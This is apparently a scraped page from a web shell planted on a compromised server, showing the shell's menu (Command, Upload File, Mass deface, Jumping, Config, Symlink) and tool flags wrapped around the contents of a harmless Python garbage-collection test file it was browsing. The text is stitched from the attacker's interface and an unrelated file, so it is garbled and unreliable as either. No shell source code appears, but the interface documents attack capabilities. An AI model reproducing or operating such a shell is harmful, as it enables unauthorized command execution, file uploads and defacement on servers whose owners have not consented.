OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /python/../python/../python/lib/python3.9/html/../html/../pydoc_data/../test/dtracedata/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
import gc def start(): gc.collect(0) gc.collect(1) gc.collect(2) l = [] l.append(l) del l gc.collect(2) gc.collect() start()